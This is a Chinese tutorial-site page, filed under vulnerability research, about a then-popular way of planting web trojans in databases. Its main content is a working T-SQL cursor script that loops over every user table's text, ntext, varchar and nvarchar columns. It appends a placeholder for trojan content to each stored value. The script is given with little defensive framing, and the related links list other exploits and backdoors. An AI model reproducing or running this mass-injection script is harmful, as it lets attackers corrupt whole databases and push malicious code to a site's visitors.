手机
当前位置:查字典教程网 >实用技巧 >漏洞研究 >最近比较流行的数据库挂马
最近比较流行的数据库挂马
摘要:SQL语句如下:用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马。(全部是允许写入字符的字段)xtype=99ntextxtype...

SQL语句如下:

用游标遍历所有表里如下数据类型的字段,然后UPDATE挂马。(全部是允许写入字符的字段)

xtype=99ntext

xtype=35text

xtype=231nvarchar

xtype=167varchar

———————YD的分割——————————–

DECLARE@Tvarchar(255),

@Cvarchar(255)

DECLARETable_CursorCURSORFOR

Select

a.name,b.name

fromsysobjectsa,

syscolumnsb

wherea.id=b.idand

a.xtype='u'and

(b.xtype=99orb.xtype=35orb.xtype=231orb.xtype=167)

OPENTable_Cursor

FETCHNEXTFROMTable_CursorINTO@T,@C

WHILE(@@FETCH_STATUS=0)

BEGIN

exec('update['+@T+']set['+@C+']=

rtrim(convert(varchar,['+@C+']))+

”挂马内容”')

FETCHNEXTFROMTable_CursorINTO@T,@C

END

CLOSETable_Cursor

DEALLOCATETable_Cursor

———————YD的分割——————————–

【最近比较流行的数据库挂马】相关文章:

揭露88red生成htm静态页面企业建站系统漏洞第1/2页

COCOON Counter统计程序后台写马

google hack dat 又增加的一些比较新的数据

基于DoS攻击的随机数据包标记源跟踪算法

BBSXP5.15最新漏洞精简版

视窗操作系统密码体系的弱点及对策(图)

IIS5 ISAPI Extension Back Door

蜜罐技术:消除防火墙局限和脆弱

浅析国内某网络游戏的安全现况

最新迅雷本地溢出POC

精品推荐
分类导航